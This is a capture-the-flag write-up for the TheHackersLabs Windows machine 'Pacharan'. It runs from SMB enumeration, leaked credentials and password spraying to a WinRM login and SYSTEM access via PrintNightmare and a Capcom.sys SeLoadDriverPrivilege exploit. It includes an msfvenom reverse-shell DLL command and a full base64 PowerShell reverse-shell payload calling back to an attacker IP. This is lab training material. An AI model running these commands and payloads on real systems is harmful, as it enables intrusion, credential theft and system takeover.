Pacharan – TheHackersLabs Link to heading

  • OS: Linux
  • Difficulty: Easy
  • Platform: TheHackersLabs

‘TheHackersLabs’ Avatar


Summary Link to heading

“Pacharan” is an easy machine from TheHackersLabs platform. An anonymous login through SMB service leakes information about potential passwords and users in this machine. This allows us to enter in the victim machine with a user containing SeLoadDriverPrivilege enabled. We can then use this privilege to escalate privileges and own the system.


User Link to heading

Nmap scan shows multiple ports open: 53 DNS, 88 Kerberos, 135 Microsoft RPC, 389 LDAP, 445 SMB, 5985 WinRM; among many others:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49669,49670,49671,49672,49675,49681,49688 192.168.69.69 -oN targeted

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 05:56 -03
Nmap scan report for 192.168.69.69
Host is up (0.00025s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-17 03:57:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:F9:EA:71 (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-09-17T03:58:11
|_  start_date: 2024-09-17T03:46:38
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: -5h00m01s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f9:ea:71 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.14 seconds

To get info against this target, we run enum4linux-ng. If we attempt to get info with session guest, we get:

❯ python3 /home/gunzf0x/GitStuff/enum4linux-ng/enum4linux-ng.py 192.168.69.69 -u 'guest' -p ''

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 192.168.69.69
[*] Username ......... 'guest'
[*] Random Username .. 'zgjzuauv'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 192.168.69.69    |
 =====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    Domain Information via LDAP for 192.168.69.69    |
 =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: PACHARAN.THL

<SNIP>

 ============================================================
|    Domain Information via SMB session for 192.168.69.69    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: WIN-VRU3GG3DPLJ
NetBIOS domain name: PACHARAN
DNS domain: PACHARAN.THL
FQDN: WIN-VRU3GG3DPLJ.PACHARAN.THL
Derived membership: domain member
Derived domain: PACHARAN

<SNIP>

 =======================================
|    Shares via RPC on 192.168.69.69    |
 =======================================
[*] Enumerating shares
[+] Found 10 share(s):
ADMIN$:
  comment: Admin remota
  type: Disk
C$:
  comment: Recurso predeterminado
  type: Disk
IPC$:
  comment: IPC remota
  type: IPC
NETLOGON:
  comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
  type: Disk
NETLOGON2:
  comment: ''
  type: Disk
PACHARAN:
  comment: ''
  type: Disk
PDF Pro Virtual Printer:
  comment: Soy Hacker y arreglo impresoras
  type: Printer
SYSVOL:
  comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
  type: Disk
Users:
  comment: ''
  type: Disk
print$:
  comment: Controladores de impresora
  type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: DENIED
[*] Testing share NETLOGON2
[+] Mapping: OK, Listing: OK
[*] Testing share PACHARAN
[+] Mapping: OK, Listing: DENIED
[*] Testing share PDF Pro Virtual Printer
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: DENIED
[*] Testing share Users
[+] Mapping: OK, Listing: DENIED
[*] Testing share print$
[+] Mapping: OK, Listing: DENIED

<SNIP>

If we check what shares we have as guest user with NetExec we get:

❯ netexec smb 192.168.69.69 -u 'guest' -p '' --shares

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\guest:
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON                        Recurso compartido del servidor de inicio de sesión
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON2       READ
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PDF Pro Virtual Printer                 Soy Hacker y arreglo impresoras
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  print$                          Controladores de impresora
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  SYSVOL                          Recurso compartido del servidor de inicio de sesión

Here, NETLOGON2 is not a usual share.

If we check this shared resource with smbclient, we can see:

❯ smbclient -U guest% //192.168.69.69/NETLOGON2

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 31 13:25:34 2024
  ..                                  D        0  Wed Jul 31 13:25:34 2024
  Orujo.txt                           A       22  Wed Jul 31 13:25:55 2024

                7735807 blocks of size 4096. 4721853 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (7.2 KiloBytes/sec) (average 7.2 KiloBytes/sec)

Where we were able to get a file called Orujo.txt.

Reading its content returns:

❯ cat Orujo.txt

Pericodelospalotes6969

Since Orujo seems like a user and Pericodelospalotes6969 seems like a password, we can check if these credentials are valid in SMB service with NetExec:

❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969'
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\orujo:Pericodelospalotes6969

We can then check if we have new shared resources that we are allowed to read:

❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --shares --filter-shares READ

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\orujo:Pericodelospalotes6969
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON        READ            Recurso compartido del servidor de inicio de sesión
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN        READ

We can now read PACHARAN shared resource.

Using smbmap in this new shared resource, shows a new file:

❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' -r 'PACHARAN' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 192.168.69.69:445       Name: 192.168.69.69             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión
        NETLOGON2                                               NO ACCESS
        PACHARAN                                                READ ONLY
        ./PACHARAN
        dr--r--r--                0 Wed Jul 31 13:21:13 2024    .
        dr--r--r--                0 Wed Jul 31 13:21:13 2024    ..
        fr--r--r--              921 Wed Jul 31 13:21:13 2024    ah.txt
        PDF Pro Virtual Printer                                 NO ACCESS       Soy Hacker y arreglo impresoras
        print$                                                  NO ACCESS       Controladores de impresora
        SYSVOL                                                  NO ACCESS       Recurso compartido del servidor de inicio de sesión
        Users                                                   NO ACCESS
[*] Closed 1 connections

We download this new file:

❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --download 'PACHARAN/ah.txt' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: PACHARAN\ah.txt (921 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/nmap/192.168.69.69-PACHARAN_ah.txt
[*] Closed 1 connections

If we read this file, we have what might be potential passwords:

❯ cat 192.168.69.69-PACHARAN_ah.txt

Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
<SNIP>
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1

We can then use Microsoft RPC along with rpcclient enumerate users in the system:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'

Administrador
Invitado
krbtgt
DefaultAccount
Orujo
Ginebra
Whisky
Hendrick
Chivas Regal
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons

We can then attempt a Password Spray with the potential password list against these users. First, use rpcclient output to generate a list of potential users:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}' > potential_users.txt

Then, do a Password Spray against these users using the passwords found using NetExec:

❯ netexec smb 192.168.69.69 -u potential_users.txt -p ah.txt --continue-on-success | grep '\[+\]'

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Whisky:MamasoyStream2er@

and we get credentials: Whisky:MamasoyStream2er@.

We remember from the first scan to SMB shares, that there was a printer message. We can check if we have something in Microsoft RPC service using rpcclient:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'

        flags:[0x800000]
        name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
        description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
        comment:[Soy Hacker y arreglo impresoras]

We then check if one of our users is valid:

❯ netexec smb 192.168.69.69 -u potential_users.txt -p 'TurkisArrusPuchuchuSiu1' | grep '\[+\]'

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1

and we get credentials: Chivas Regal:TurkisArrusPuchuchuSiu1.

We can check if this user is allowed to log in via WinRM:

❯ netexec winrm 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'

WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)

and we can.

We can finally connect as this user with evil-winrm:

❯ evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents>

and read the user flag at this user’s Desktop.


NT Authority/System - Administrator Link to heading

We find 2 ways to pwn the system.


Privesc #1: Use PrintNightmare Link to heading

We can check if this system might be vulnerable to CVE-2021-34527, a.k.a., PrintNightmare. For this, we can run:

❯ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

MS-PAR. and MS-RPRN protocols are enabled. This is a good sign.

We can then use this Powershell module for PrintNightmare. Then, upload it to the system with upload function from evil-winrm:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload CVE-2021-34527.ps1 .\printNightmare.ps1

Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\.\printNightmare.ps1

Data: 238084 bytes of 238084 bytes copied

Info: Upload successful!

and import it:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\printNightmare.ps1

Once uploaded and imported, I attempt to create a user running:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DriverName "Xerox" -NewUser "gunzf0x" -NewPassword "gunzf0x123$!"

[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user gunzf0x as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll

Even if the output says it was created, if I check users in the system my user is not there:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net user

Cuentas de usuario de \\

-------------------------------------------------------------------------------
Administrador            beefeater                CarlosV
Chivas                   Chivas Regal             DefaultAccount
Ginebra                  Gordons                  Hendrick
Invitado                 JB                       krbtgt
Orujo                    RedLabel                 Whisky
Whisky2
El comando se ha completado con uno o m s errores.

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net localgroup administradores

Nombre de alias      administradores
Comentario           Los administradores tienen acceso completo y sin restricciones al equipo o dominio

Miembros

-------------------------------------------------------------------------------
Administrador
Administradores de empresas
Admins. del dominio
Se ha completado el comando correctamente.

I then attempt to run it with the “defualt” option. But, again, the output says it worked, but the user is not created:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare

[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll

I think this problem might be due to the machine being in spanish (changing the group administrators to administradores).

Reading the Github repository for the script also provides a flag -DLL to execute a .dll file. For this reason, I create a malicious .dll file with msfvenom in my attacker machine:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.69.2 LPORT=443 -f dll -o rev.dll

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

where 192.168.69.2 is my attacker IP address and 443 is the port I will start listening with netcat.

Again, we upload it to the target machine using upload function from evil-winrm:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload rev.dll

Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/rev.dll to C:\Users\Chivas Regal\Documents\rev.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Since the space in Chivas Regal username can cause a conflict in the absolute path, I will copy this file to another directory. Based on AppLockerBypasses page, I will select the path:

C:\Windows\System32\spool\drivers\color

that should not have permission problems to write files there.

We then copy the malicious .dll file there with evil-winrm session:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> copy rev.dll C:\Windows\System32\spool\drivers\color\rev.dll

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> dir C:\Windows\System32\spool\drivers\color


    Directorio: C:\Windows\System32\spool\drivers\color


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/16/2016   3:18 PM           1058 D50.camp
-a----        7/16/2016   3:18 PM           1079 D65.camp
-a----        7/16/2016   3:18 PM            797 Graphics.gmmp
-a----        7/16/2016   3:18 PM            838 MediaSim.gmmp
-a----        7/16/2016   3:18 PM            786 Photo.gmmp
-a----        7/16/2016   3:18 PM            822 Proofing.gmmp
-a----        9/17/2024   7:13 AM           9216 rev.dll
-a----        7/16/2016   3:18 PM         218103 RSWOP.icm
-a----        7/16/2016   3:18 PM           3144 sRGB Color Space Profile.icm
-a----        7/16/2016   3:18 PM          17155 wscRGB.cdmp
-a----        7/16/2016   3:18 PM           1578 wsRGB.cdmp

I will then start a listener with netcat on port 443 in my attacker machine:

❯ nc -lvnp 443

listening on [any] 443 ...

In the victim machine, I execute the malicious .dll file using -DLL flag along with Invoke-Nightmare malicious module:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dll'

[+] using user-supplied payload at C:\Windows\System32\spool\drivers\color\rev.dll
[!] ignoring NewUser and NewPassword arguments
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[!] AddPrinterDriverEx failed
At line:1 char:1
+ Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-Nightmare

it returned an error. However, in my netcat listener, I get:

❯ nc -lvnp 443

listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58002
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>whoami

whoami
nt authority\system

we are nt authority/system. GG.


Privesc #2: Use SeLoadDriverPrivilege privilege Link to heading

If we check what are the privileges of Chivas Regal user, we get:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv

INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                     Estado
============================= =============================================== ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio        Habilitada
SeLoadDriverPrivilege         Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso    Habilitada

We can see the SeLoadDriverPrivilege privilege enabled.

We can use this repository that provides all the necessary files to exploit this privilege. We can clone this repository in our attacker machine. Then, pass the files using, again, evil-winrm:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload Capcom.sys C:\Windows\System32\spool\drivers\color\Capcom.sys

Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/Capcom.sys to C:\Windows\System32\spool\drivers\color\Capcom.sys

Data: 14100 bytes of 14100 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload ExploitCapcom.exe C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe

Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/ExploitCapcom.exe to C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe

Data: 387752 bytes of 387752 bytes copied

Info: Upload successful!

Then, load the .sys file using LOAD command:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys

[*] Service Name: aabvavbo
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0

and check if this has worked, testing with whoami command with EXPLOIT module:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT whoami

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000216F7BE0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system

the command is being executed, and the output is nt authority/system. Therefore, we are executing commands as this user.

Finally, we can go to Reverse Shell Generator page (https://www.revshells.com/), search for PowerShell #3 (Base64) payload, put our attacker IP address and listening port with netcat (that in my cases are 192.168.69.2 and 443, respectively), and generate a payload. Before executing the payload, start a netcat listener in our attacker machine:

❯ nc -lvnp 443

listening on [any] 443 ...

and, finally, execute the payload abusing ExploitCapcom.exe in the victim machine:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADYAOQAuADIAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 0000026321830008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed

and we get a shell as nt authority/system in our listener:

❯ nc -lvnp 443

listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58090
whoami

nt authority\system

PS C:\Users\Chivas Regal\Documents>

We can finally read the root flag at Administrador desktop.


~Happy Hacking